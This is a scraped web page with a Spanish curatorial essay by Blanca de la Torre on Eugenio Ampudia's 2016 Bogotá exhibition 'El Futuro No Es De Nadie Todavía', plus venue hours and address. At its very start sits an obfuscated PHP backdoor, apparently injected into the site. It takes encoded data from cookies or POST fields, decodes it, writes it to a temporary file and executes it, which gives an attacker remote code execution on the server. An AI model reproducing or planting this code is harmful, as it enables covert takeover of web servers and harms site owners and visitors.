$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> El Futuro No Es De Nadie Todavía – www.interferencechannel.com

El Futuro No Es De Nadie Todavía

La presente exposición de Eugenio Ampudia, uno de los artistas españoles más

reconocidos actualmente, contiene las ideas clave del artista en todas sus modali-
dades: su actitud crítica, el análisis de los mecanismos de producción, promoción

y consumo del arte, las estrategias detrás de la obra artística y el papel protagonista

del espectador como contemplador, completador e intérprete de la misma.

Ante todo, esta selección de obras devela una preocupación central en su trabajo:

la mirada irónica hacia la Institución Arte, ambas con mayúscula, enfatizando la

importancia para todo artista de situarse en un espacio de resistencia, caminando

como un funambulista entre la subversión y lo políticamente incorrecto.

A partir de entender el arte como un código universal, a Eugenio Ampudia

siempre le ha interesado moverse en un espacio en permanente reinterpretación,

un estado de redefinición también aplicable a las propias prácticas artísticas, que

le sirven como mecanismo detonante del pensamiento, de las estructuras y el

sistema que habitamos.

Esta es una exposición que se configura como un juego de paradojas afines al signo

de los tiempos: presencias invisibles, imaginarias y virtuales, que nos recuerdan

que hay que ver más allá de nuestros ojos y que no debemos olvidar que nada está

determinado y sobre todo, que El futuro no es de nadie todavía.♦

*Blanca de la Torre

Curadora

 

El Futuro No Es De Nadie Todavía
Eugenio Ampudia
Curaduría de Blanca de la Torre
Agosto 6 a Octubre 1 de 2016

www.nc-arte.org

ENTRADA LIBRE
Horarios:
Lunes a viernes: 10 am a 6 pm
Sábados: 11 am a 2 pm
Dirección: Cra. 5 No. 26 B – 76 Bogotá, Colombia.
Teléfonos: 2821474 / 0973

Comments are closed.